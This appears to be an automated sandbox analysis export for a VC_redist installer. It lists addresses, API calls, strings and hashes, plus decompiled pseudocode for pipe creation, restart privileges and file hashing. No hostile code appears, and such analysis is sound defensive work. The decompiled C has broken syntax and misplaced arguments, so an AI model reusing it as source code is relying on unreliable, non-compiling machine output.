                                                                          0x000269ed
                                                                          0x000269ee
                                                                          0x000269f3
                                                                          0x000269f5
                                                                          0x000269f8
                                                                          0x000269f9
                                                                          0x000269fc
                                                                          0x000269ff
                                                                          0x00026a02
                                                                          0x00026a05
                                                                          0x00026a08
                                                                          0x00026a0b
                                                                          0x00026a0e
                                                                          0x00026a0f
                                                                          0x00026a14
                                                                          0x00026a29
                                                                          0x00026a2d
                                                                          0x00026a4f
                                                                          0x00026a54
                                                                          0x00026a5c
                                                                          0x00026a62
                                                                          0x00026a65
                                                                          0x00026a6c
                                                                          0x00026a6e
                                                                          0x00026a71
                                                                          0x00026a76
                                                                          0x00026a79
                                                                          0x00026a80
                                                                          0x00026a90
                                                                          0x00026a92
                                                                          0x00026a94
                                                                          0x00026abb
                                                                          0x00026abf
                                                                          0x00026ae3
                                                                          0x00026ae4
                                                                          0x00026aed
                                                                          0x00026aef
                                                                          0x00026af8
                                                                          0x00026b00
                                                                          0x00026b07
                                                                          0x00026b12
                                                                          0x00026b14
                                                                          0x00026b16
                                                                          0x00026b1f
                                                                          0x00026b21
                                                                          0x00026b27
                                                                          0x00026b52
                                                                          0x00026b52
                                                                          0x00026b58
                                                                          0x00026b5a
                                                                          0x00026b8b
                                                                          0x00026b8b
                                                                          0x00026b91
                                                                          0x00026bec
                                                                          0x00026bec
                                                                          0x00026bf2
                                                                          0x00026c1e
                                                                          0x00026c1e
                                                                          0x00026c24
                                                                          0x00026cbc
                                                                          0x00026cbf
                                                                          0x00026cbf
                                                                          0x00026cc5
                                                                          0x00026ce2
                                                                          0x00026cec
                                                                          0x00026cec
                                                                          0x00026cf1
                                                                          0x00026cf3
                                                                          0x00026d01
                                                                          0x00026d01
                                                                          0x00026d03
                                                                          0x00026d05
                                                                          0x00026d09
                                                                          0x00026d0b
                                                                          0x00026d0f
                                                                          0x00026d11
                                                                          0x00026d15
                                                                          0x00026d17
                                                                          0x00026d1e
                                                                          0x00026d34
                                                                          0x00026d34
                                                                          0x00026d1e
                                                                          0x00026d15
                                                                          0x00026d0f
                                                                          0x00026d09
                                                                          0x00000000
                                                                          0x00026cf5
                                                                          0x00026cf6
                                                                          0x00026cfb
                                                                          0x00026cfd
                                                                          0x00026d39
                                                                          0x00026d39
                                                                          0x00026d3d
                                                                          0x00026d74
                                                                          0x00026d74
                                                                          0x00026d78
                                                                          0x00026d80
                                                                          0x00026d80
                                                                          0x00000000
                                                                          0x00026d78
                                                                          0x00026d3f
                                                                          0x00026d43
                                                                          0x00026d52
                                                                          0x00026d54
                                                                          0x00026d54
                                                                          0x00026d55
                                                                          0x00026d55
                                                                          0x00026d57
                                                                          0x00026d63
                                                                          0x00026d65
                                                                          0x00026d65
                                                                          0x00026d66
                                                                          0x00026d6f
                                                                          0x00000000
                                                                          0x00026d6f
                                                                          0x00026d59
                                                                          0x00026d5d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026d5f
                                                                          0x00000000
                                                                          0x00026d5f
                                                                          0x00026d45
                                                                          0x00026d4c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026d4e
                                                                          0x00000000
                                                                          0x00026d4e
                                                                          0x00026cff
                                                                          0x00000000
                                                                          0x00026cff
                                                                          0x00026cf3
                                                                          0x00026c2d
                                                                          0x00026c31
                                                                          0x00026c38
                                                                          0x00026c4c
                                                                          0x00026c4e
                                                                          0x00026c50
                                                                          0x00026c92
                                                                          0x00026c94
                                                                          0x00026c9a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026ca2
                                                                          0x00026ca4
                                                                          0x00026ca6
                                                                          0x00026cb0
                                                                          0x00026cb6
                                                                          0x00026cb8
                                                                          0x00000000
                                                                          0x00026cb8
                                                                          0x00026ca8
                                                                          0x00026c85
                                                                          0x00026c86
                                                                          0x00026c8c
                                                                          0x00000000
                                                                          0x00026c8c
                                                                          0x00026c52
                                                                          0x00026c61
                                                                          0x00026c63
                                                                          0x00026c6b
                                                                          0x00026c6d
                                                                          0x00026c7b
                                                                          0x00026c80
                                                                          0x00000000
                                                                          0x00026c80
                                                                          0x00026bfa
                                                                          0x00026bfc
                                                                          0x00026bfe
                                                                          0x00026c15
                                                                          0x00026c1c
                                                                          0x00026c1c
                                                                          0x00000000
                                                                          0x00026c1c
                                                                          0x00026c00
                                                                          0x00026c06
                                                                          0x00026c0b
                                                                          0x00026c0f
                                                                          0x00000000
                                                                          0x00026c0f
                                                                          0x00026b9a
                                                                          0x00026ba1
                                                                          0x00026ba3
                                                                          0x00026bb1
                                                                          0x00026bd3
                                                                          0x00026bd5
                                                                          0x00026bd7
                                                                          0x00026be3
                                                                          0x00026bea
                                                                          0x00026bea
                                                                          0x00000000
                                                                          0x00026bea
                                                                          0x00026bd9
                                                                          0x00000000
                                                                          0x00026bd9
                                                                          0x00026ba5
                                                                          0x00000000
                                                                          0x00026ba5
                                                                          0x00026b79
                                                                          0x00026b7b
                                                                          0x00026b7d
                                                                          0x00026b89
                                                                          0x00026b89
                                                                          0x00000000
                                                                          0x00026b89
                                                                          0x00026b7f
                                                                          0x00000000
                                                                          0x00026b7f
                                                                          0x00026b29
                                                                          0x00026b2f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026b31
                                                                          0x00026b37
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026b39
                                                                          0x00026b3f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00026b41
                                                                          0x00026b46
                                                                          0x00026b48
                                                                          0x00000000
                                                                          0x00026b18
                                                                          0x00026b18
                                                                          0x00000000
                                                                          0x00026b18
                                                                          0x00026af1
                                                                          0x00026af1
                                                                          0x00000000
                                                                          0x00026af1
                                                                          0x00026ac1
                                                                          0x00026ac3
                                                                          0x00026aca
                                                                          0x00026ad9
                                                                          0x00000000
                                                                          0x00026ad9
                                                                          0x00026a96
                                                                          0x00026aa1
                                                                          0x00026aa6
                                                                          0x00026aab
                                                                          0x00026aab
                                                                          0x00026aac
                                                                          0x00026ab1
                                                                          0x00026ab3
                                                                          0x00026ab3
                                                                          0x00000000
                                                                          0x00026ab3
                                                                          0x00026a2f
                                                                          0x00026a2f
                                                                          0x00026a34
                                                                          0x00026a35
                                                                          0x00026d85
                                                                          0x00026d85
                                                                          0x00026d8c
                                                                          0x00026d95
                                                                          0x00026d9a
                                                                          0x00026da3
                                                                          0x00026da3
                                                                          0x00026dad
                                                                          0x00026db6
                                                                          0x00026db6
                                                                          0x00026dbd
                                                                          0x00026dc0
                                                                          0x00026dc0
                                                                          0x00026dc6
                                                                          0x00026dcc
                                                                          0x00026dcf
                                                                          0x00026dd2
                                                                          0x00026ddc
                                                                          0x00026dde
                                                                          0x00026dde
                                                                          0x00026ded
                                                                          0x00026df6
                                                                          0x00026dff
                                                                          0x00026e0f
                                                                          0x00026e0f

                                                                          APIs
                                                                            • Part of subcall function 0001D39D: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3AC
                                                                            • Part of subcall function 0001D39D: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0001D3BB
                                                                            • Part of subcall function 0001D39D: LeaveCriticalSection.KERNEL32(000000D0,?,00026E4B,000000B8,00000000,?,00000000,76B6A770), ref: 0001D3D0
                                                                          • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00026D9A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00026DA3
                                                                          • CloseHandle.KERNEL32(00014740,?,00000000,?,00000000,00000001,00000000), ref: 00026DC0
                                                                          Strings
                                                                          • crypt32.dll, xrefs: 00026CD2
                                                                          • Failed to register bundle., xrefs: 00026C00
                                                                          • Failed while caching, aborting execution., xrefs: 00026CA8
                                                                          • Failed to elevate., xrefs: 00026BA5
                                                                          • Failed to set initial apply variables., xrefs: 00026B18
                                                                          • UX aborted apply begin., xrefs: 00026AA6
                                                                          • Another per-machine setup is already executing., xrefs: 00026BD9
                                                                          • Failed to cache user to working directory., xrefs: 00026B7F
                                                                          • user cannot start apply because it is busy with another action., xrefs: 00026A2F
                                                                          • core.cpp, xrefs: 00026A9C, 00026C76
                                                                          • Another per-user setup is already executing., xrefs: 00026AF1
                                                                          • Failed to create cache thread., xrefs: 00026C80
                                                                          • @Met, xrefs: 00026C52
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCriticalHandleSection$CompareEnterExchangeInterlockedLeaveMutexRelease
                                                                          • String ID: @Met$Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                          • API String ID: 322611130-4076813137
                                                                          • Opcode ID: fbf3b5878cc433ad0711a796f19b611053d67a796a02bd0b0ecf237c1d81bbb9
                                                                          • Instruction ID: 3da337a988285e4d454a0849b57bf94225ac25999f8e51ad1bfdf0ecc9ce7d10
                                                                          • Opcode Fuzzy Hash: fbf3b5878cc433ad0711a796f19b611053d67a796a02bd0b0ecf237c1d81bbb9
                                                                          • Instruction Fuzzy Hash: 91C10471E01A2ABFDB199BA0DC45BEFB7B9FF04305F00422AF615A6141DB32AD44CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00024CE8 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 161pipeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00024CE8(intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				long _v8;
				long _v12;
				signed int _v16;
				long _v20;
				long _v24;
				char _v28;
				void* _t37;
				signed short _t45;
				signed short _t50;
				void** _t54;
				signed short _t56;
				void* _t61;
				intOrPtr* _t66;
				void* _t67;

				_v16 = _v16 | 0xffffffff;
				asm("stosd");
				_v12 = 0;
				_v8 = 0;
				asm("stosd");
				asm("stosd");
				if(_a8 != 0) {
					L4:
					_t66 = _a4;
					_t67 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls",  *_t66);
					if(_t67 >= 0) {
						_t34 =  ==  ? 0 :  &_v28;
						_t61 = CreateNamedPipeW(_v8, "eature: %2!ls!, state: %3!hs!\r\n", 0, 1, 0x10000, 0x10000, 1,  ==  ? 0 :  &_v28);
						if(_t61 != 0xffffffff) {
							if(_a8 == 0) {
								_t37 = _v16;
								goto L16;
							} else {
								_t67 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t66);
								if(_t67 >= 0) {
									_t37 = CreateNamedPipeW(_v8, "eature: %2!ls!, state: %3!hs!\r\n", 0, 1, 0x10000, 0x10000, 1, 0);
									if(_t37 != 0xffffffff) {
										L16:
										 *(_t66 + 0x14) = _t37;
										 *(_t66 + 0x10) = _t61;
										 *_a12 =  *_a12 & 0x00000000;
									} else {
										_t45 = GetLastError();
										_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
										_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "pipe.cpp", 0x132, _t67);
										_push(_v8);
										_push("Failed to create pipe: %ls");
										goto L14;
									}
								} else {
									_push( *_t66);
									_push("Failed to allocate full name of cache pipe: %ls");
									L14:
									_push(_t67);
									E0005012F();
									CloseHandle(_t61);
								}
							}
						} else {
							_t50 = GetLastError();
							_t73 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
							_t67 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "pipe.cpp", 0x126, _t67);
							_push(_v8);
							_push("Failed to create pipe: %ls");
							goto L6;
						}
					} else {
						_push( *_t66);
						_push("Failed to allocate full name of pipe: %ls");
						L6:
						_push(_t67);
						E0005012F();
					}
				} else {
					_push(0);
					_t54 =  &_v12;
					_push(_t54);
					_push(1);
					_push(L"D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)");
					L0003DE30();
					if(_t54 != 0) {
						_v28 = 0xc;
						_v24 = _v12;
						_v20 = 0;
						goto L4;
					} else {
						_t56 = GetLastError();
						_t76 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
						_t67 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "pipe.cpp", 0x116, _t67);
						_push("Failed to create the security descriptor for the connection event and pipe.");
						_push(_t67);
						E0005012F();
					}
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_v12 != 0) {
					LocalFree(_v12);
				}
				return _t67;
			}

















                                                                          0x00024cee
                                                                          0x00024cfc
                                                                          0x00024cfd
                                                                          0x00024d00
                                                                          0x00024d03
                                                                          0x00024d04
                                                                          0x00024d08
                                                                          0x00024d6f
                                                                          0x00024d6f
                                                                          0x00024d82
                                                                          0x00024d89
                                                                          0x00024da8
                                                                          0x00024dc6
                                                                          0x00024dcb
                                                                          0x00024e09
                                                                          0x00024e9b
                                                                          0x00000000
                                                                          0x00024e0f
                                                                          0x00024e1f
                                                                          0x00024e26
                                                                          0x00024e48
                                                                          0x00024e51
                                                                          0x00024e9e
                                                                          0x00024e9e
                                                                          0x00024ea4
                                                                          0x00024ea7
                                                                          0x00024e53
                                                                          0x00024e53
                                                                          0x00024e64
                                                                          0x00024e6e
                                                                          0x00024e7c
                                                                          0x00024e81
                                                                          0x00024e84
                                                                          0x00000000
                                                                          0x00024e84
                                                                          0x00024e28
                                                                          0x00024e28
                                                                          0x00024e2a
                                                                          0x00024e89
                                                                          0x00024e89
                                                                          0x00024e8a
                                                                          0x00024e93
                                                                          0x00024e93
                                                                          0x00024e26
                                                                          0x00024dcd
                                                                          0x00024dcd
                                                                          0x00024dde
                                                                          0x00024de8
                                                                          0x00024df6
                                                                          0x00024dfb
                                                                          0x00024dfe
                                                                          0x00000000
                                                                          0x00024dfe
                                                                          0x00024d8b
                                                                          0x00024d8b
                                                                          0x00024d8d
                                                                          0x00024d92
                                                                          0x00024d92
                                                                          0x00024d93
                                                                          0x00024d98
                                                                          0x00024d0a
                                                                          0x00024d0a
                                                                          0x00024d0b
                                                                          0x00024d0e
                                                                          0x00024d0f
                                                                          0x00024d11
                                                                          0x00024d16
                                                                          0x00024d1d
                                                                          0x00024d62
                                                                          0x00024d69
                                                                          0x00024d6c
                                                                          0x00000000
                                                                          0x00024d1f
                                                                          0x00024d1f
                                                                          0x00024d30
                                                                          0x00024d3a
                                                                          0x00024d48
                                                                          0x00024d4d
                                                                          0x00024d52
                                                                          0x00024d53
                                                                          0x00024d59
                                                                          0x00024d1d
                                                                          0x00024eae
                                                                          0x00024eb3
                                                                          0x00024eb3
                                                                          0x00024ebc
                                                                          0x00024ec1
                                                                          0x00024ec1
                                                                          0x00024ecf

                                                                          APIs
                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00024D16
                                                                          • GetLastError.KERNEL32(?,00000000,?,?,0001442A,?), ref: 00024D1F
                                                                          • CreateNamedPipeW.KERNEL32(000000FF,eature: %2!ls!, state: %3!hs!,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0001442A,?), ref: 00024DC0
                                                                          • GetLastError.KERNEL32(?,0001442A,?), ref: 00024DCD
                                                                          • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0001442A,?), ref: 00024E93
                                                                          • LocalFree.KERNEL32(00000000,?,0001442A,?), ref: 00024EC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorErrorLastSecurity$CloseConvertCreateFreeHandleLocalNamedPipeString
                                                                          • String ID: @Met$D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$eature: %2!ls!, state: %3!hs!$pipe.cpp
                                                                          • API String ID: 3065245045-1794844320
                                                                          • Opcode ID: 654e116a0b19abcb7807d16e6bf6761474bb1a66a9b0fe811190d2a7283b0ebc
                                                                          • Instruction ID: 14080228f17cd7ca6a3f4048636bb623e6805d392eeb2037e781db4b31b08831
                                                                          • Opcode Fuzzy Hash: 654e116a0b19abcb7807d16e6bf6761474bb1a66a9b0fe811190d2a7283b0ebc
                                                                          • Instruction Fuzzy Hash: F051D271E40325BBEB219BA4EC46BEFBAA9EF04711F114125FE01FA1D0D3759E808A91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000144E9 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 43%
                                                                          			E000144E9(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t13;
				int _t24;
				signed short _t31;
				signed short _t34;
				signed short _t37;
				void* _t45;
				int _t47;
				int _t48;
				signed int _t60;

				_t45 = __edx;
				_t13 =  *0x7a008; // 0xfbf51acb
				_v8 = _t13 ^ _t60;
				asm("stosd");
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t47 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					if(LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)) != 0) {
						if(AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0) != 0) {
							do {
								_t48 = 0;
								Sleep(0x3e8);
								_push(0x80040002);
								_push(1);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								if( *0x7aa5c() == 0) {
									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
								}
								_t24 = _t47;
								_t47 = _t47 + 1;
							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
							if(_t48 < 0) {
								E000137D3(_t24, "engine.cpp", 0x376, _t48);
								_push("Failed to schedule restart.");
								goto L13;
							}
						} else {
							_t31 = GetLastError();
							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "engine.cpp", 0x362, _t48);
							_push("Failed to adjust token to add shutdown privileges.");
							goto L13;
						}
					} else {
						_t34 = GetLastError();
						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "engine.cpp", 0x35d, _t48);
						_push("Failed to get shutdown privilege LUID.");
						goto L13;
					}
				} else {
					_t37 = GetLastError();
					_t59 =  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					_t48 =  >=  ? 0x80004005 :  <=  ? _t37 : _t37 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "engine.cpp", 0x356, _t48);
					_push("Failed to get process token.");
					L13:
					_push(_t48);
					E0005012F();
				}
				if(_v28 != 0) {
					CloseHandle(_v28);
				}
				return E0003DE36(0, _v8 ^ _t60, _t45, _t47, _t48);
			}




















                                                                          0x000144e9
                                                                          0x000144ef
                                                                          0x000144f6
                                                                          0x00014501
                                                                          0x00014504
                                                                          0x00014507
                                                                          0x00014508
                                                                          0x00014509
                                                                          0x00014510
                                                                          0x00014521
                                                                          0x0001455e
                                                                          0x0001456c
                                                                          0x0001457b
                                                                          0x000145c9
                                                                          0x00014600
                                                                          0x00014605
                                                                          0x00014607
                                                                          0x0001460d
                                                                          0x00014612
                                                                          0x00014614
                                                                          0x00014615
                                                                          0x00014616
                                                                          0x00014617
                                                                          0x00014620
                                                                          0x00014633
                                                                          0x00014633
                                                                          0x00014636
                                                                          0x00014638
                                                                          0x00014639
                                                                          0x00014650
                                                                          0x0001465d
                                                                          0x00014662
                                                                          0x00000000
                                                                          0x00014662
                                                                          0x000145cb
                                                                          0x000145cb
                                                                          0x000145dc
                                                                          0x000145e6
                                                                          0x000145f4
                                                                          0x000145f9
                                                                          0x00000000
                                                                          0x000145f9
                                                                          0x0001457d
                                                                          0x0001457d
                                                                          0x0001458e
                                                                          0x00014598
                                                                          0x000145a6
                                                                          0x000145ab
                                                                          0x00000000
                                                                          0x000145ab
                                                                          0x00014523
                                                                          0x00014523
                                                                          0x00014534
                                                                          0x0001453e
                                                                          0x0001454c
                                                                          0x00014551
                                                                          0x00014667
                                                                          0x00014667
                                                                          0x00014668
                                                                          0x0001466e
                                                                          0x00014672
                                                                          0x00014677
                                                                          0x00014677
                                                                          0x0001468f

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00014512
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00014519
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00014523
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00014573
                                                                          • GetLastError.KERNEL32 ref: 0001457D
                                                                          • CloseHandle.KERNEL32(?), ref: 00014677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                                                                          • String ID: @Met$Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
                                                                          • API String ID: 4232854991-3888403951
                                                                          • Opcode ID: 7c856998b9ba8be401c9a6ebaf8bba7b2a8805079ba58b75f1e3606d41a71f56
                                                                          • Instruction ID: edf421233297cd60b85f3d5f9143a460807c8523d2b13d442ae485c5a8484d40
                                                                          • Opcode Fuzzy Hash: 7c856998b9ba8be401c9a6ebaf8bba7b2a8805079ba58b75f1e3606d41a71f56
                                                                          • Instruction Fuzzy Hash: 85410472A40324AFF7206AB99C49BFF76DCEB00756F010125FE05FB1E0D6289C8486E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004F961 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 167encryptionCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E0004F961(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, long _a24) {
				signed int _v8;
				void _v4104;
				char _v4108;
				long _v4112;
				long _v4116;
				intOrPtr _v4120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				long** _t36;
				char* _t37;
				char* _t41;
				signed short _t46;
				void* _t47;
				signed short _t49;
				void* _t50;
				signed short _t51;
				signed short _t52;
				signed short _t53;
				signed short _t54;
				void* _t55;
				long _t56;
				void* _t57;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t66;
				signed int _t85;

				_t60 = __edx;
				E00059F00();
				_t30 =  *0x7a008; // 0xfbf51acb
				_v8 = _t30 ^ _t85;
				_t56 = _a24;
				_t62 = _a4;
				_v4120 = _a16;
				_t65 = 0;
				_v4116 = 0;
				_v4108 = 0;
				_v4112 = 0;
				E0003F670(_t62,  &_v4104, 0, 0x1000);
				_t36 =  &_v4116;
				__imp__CryptAcquireContextW(_t36, 0, 0, _a8, 0xf0000040, _t61, _t64, _t55);
				if(_t36 != 0) {
					_t37 =  &_v4108;
					__imp__CryptCreateHash(_v4116, _a12, 0, 0, _t37);
					if(_t37 != 0) {
						while(ReadFile(_t62,  &_v4104, 0x1000,  &_v4112, 0) != 0) {
							_push(0);
							if(_v4112 == _t65) {
								_t41 =  &_a20;
								__imp__CryptGetHashParam(_v4108, 2, _v4120, _t41);
								if(_t41 != 0) {
									if(_t56 != 0) {
										_push(1);
										if(SetFilePointerEx(_t62, 0, 0, _t56) == 0) {
											_t46 = GetLastError();
											_t69 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
											_t47 = 0x80004005;
											_t65 =  >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
											_push( >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000);
											_push(0xfa);
											goto L8;
										}
									}
								} else {
									_t49 = GetLastError();
									_t72 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
									_t47 = 0x80004005;
									_t65 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
									_push( >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000);
									_push(0xf3);
									goto L8;
								}
							} else {
								_t50 =  &_v4104;
								__imp__CryptHashData(_v4108, _t50, _v4112);
								if(_t50 == 0) {
									_t51 = GetLastError();
									_t75 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
									_t47 = 0x80004005;
									_t65 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
									_push( >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000);
									_push(0xec);
									goto L8;
								} else {
									continue;
								}
							}
							goto L9;
						}
						_t52 = GetLastError();
						_t78 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
						_t47 = 0x80004005;
						_t65 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
						_push( >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000);
						_push(0xe1);
					} else {
						_t53 = GetLastError();
						_t81 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						_t47 = 0x80004005;
						_t65 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
						_push( >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000);
						_push(0xd9);
					}
					goto L8;
				} else {
					_t54 = GetLastError();
					_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					_t47 = 0x80004005;
					_t65 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					_push( >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000);
					_push(0xd3);
					L8:
					_push("cryputil.cpp");
					E000137D3(_t47);
				}
				L9:
				if(_v4108 != 0) {
					__imp__CryptDestroyHash(_v4108);
				}
				if(_v4116 != 0) {
					CryptReleaseContext(_v4116, 0);
				}
				_pop(_t63);
				_pop(_t66);
				_pop(_t57);
				return E0003DE36(_t57, _v8 ^ _t85, _t60, _t63, _t66);
			}



































                                                                          0x0004f961
                                                                          0x0004f969
                                                                          0x0004f96e
                                                                          0x0004f975
                                                                          0x0004f97c
                                                                          0x0004f981
                                                                          0x0004f984
                                                                          0x0004f992
                                                                          0x0004f994
                                                                          0x0004f99a
                                                                          0x0004f9a0
                                                                          0x0004f9ad
                                                                          0x0004f9b5
                                                                          0x0004f9c6
                                                                          0x0004f9ce
                                                                          0x0004f9f9
                                                                          0x0004fa0d
                                                                          0x0004fa15
                                                                          0x0004fa6c
